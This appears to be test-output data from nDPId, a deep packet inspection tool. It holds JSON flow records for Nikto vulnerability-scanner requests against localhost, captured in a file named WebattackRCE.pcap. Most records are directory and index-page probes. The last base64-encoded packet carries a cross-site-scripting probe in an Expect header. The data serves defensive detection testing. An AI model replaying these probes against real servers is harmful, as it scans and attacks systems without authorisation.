Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1576420276821,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276821,"pkt":"AAAAAAAAAAAAAAAACABFAADHQ2dAAEAG+Md\/AAABfwAAAcJSH5BEZHtRsCeOn4AYAED+uwAAAQEICp1m+32dZvt9R0VUIC9pbmRleC5hc3B4IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCg0K"} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276823,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1576420276823,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276823,"pkt":"AAAAAAAAAAAAAAAACABFAADI9WNAAEAGRsp\/AAABfwAAAcJUH5Atl81VKdEVGoAYAED+vAAAAQEICp1m+3+dZvt\/R0VUIC9kZWZhdWx0LmFzcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276823,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1576420276824,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276824,"pkt":"AAAAAAAAAAAAAAAACABFAADJPphAAEAG\/ZR\/AAABfwAAAcJWH5C0BwahLC3FVoAYAED+vQAAAQEICp1m+4CdZvuAR0VUIC9kZWZhdWx0LmFzcHggSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="} +01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276825,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1576420276825,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276825,"pkt":"AAAAAAAAAAAAAAAACABFAADIFrxAAEAGJXJ\/AAABfwAAAcJYH5C2Ei6NIzroBYAYAED+vAAAAQEICp1m+4GdZvuBR0VUIC9kZWZhdWx0Lmh0bSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276825,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1576420276827,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276827,"pkt":"AAAAAAAAAAAAAAAACABFAADFTUVAAEAG7ut\/AAABfwAAAcJaH5CLBXV23SQCI4AYAED+uQAAAQEICp1m+4OdZvuDR0VUIC9pbmRleC5kbyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.do","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1576420276828,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276828,"pkt":"AAAAAAAAAAAAAAAACABFAADICi9AAEAGMf9\/AAABfwAAAcJcH5By6zIbQafp54AYAED+vAAAAQEICp1m+4SdZvuER0VUIC9pbmRleC5qaHRtbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jhtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1576420276829,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276829,"pkt":"AAAAAAAAAAAAAAAACABFAADG08RAAEAGaGt\/AAABfwAAAcJeH5AOKuv2Y8ch84AYAED+ugAAAQEICp1m+4WdZvuFR0VUIC9pbmRleC5qc3AgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jsp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1576420276832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276832,"pkt":"AAAAAAAAAAAAAAAACABFAADGiDJAAEAGs\/1\/AAABfwAAAcJgH5Cj8LAJpHctpoAYAED+ugAAAQEICp1m+4edZvuHR0VUIC9pbmRleC54bWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7560000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420276834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1576420276834,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":240,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":240,"pkt_l4_len":206,"thread_ts_msec":1576420276834,"pkt":"AAAAAAAAAAAAAAAACABFAADiGX1AAEAGIpd\/AAABfwAAAcJkH5BjVCFE0UHCd4AYAED+1gAAAQEICp1m+4qdZvuKR0VUIC9pbmRleCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om5lZ290aWF0ZSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdDogYXBwbGljYXRpb24vd2hhdGV2ZXI7IHE9MS4wDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7560000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420276834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:negotiate)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276835,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1576420276835,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276835,"pkt":"AAAAAAAAAAAAAAAACABFAADKANNAAEAGO1l\/AAABfwAAAcJmH5BoODjpUSa4iYAYAED+vgAAAQEICp1m+4udZvuLR0VUIC9+YmluIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDphcGFjaGV1c2Vyczoga25vd24gdXNlcikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276835,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/~bin","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apacheusers: known user)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420276837,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00713{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1576420276837,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420276837,"pkt":"AAAAAAAAAAAAAAAACABFAADlgjNAAEAGud1\/AAABfwAAAcJoH5AFkroJ2Lkky4AYAED+2QAAAQEICp1m+42dZvuNR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KRXhwZWN0OiA8c2NyaXB0PmFsZXJ0KHhzcyk8L3NjcmlwdD4NClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDphcGFjaGVfZXhwZWN0X3hzcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
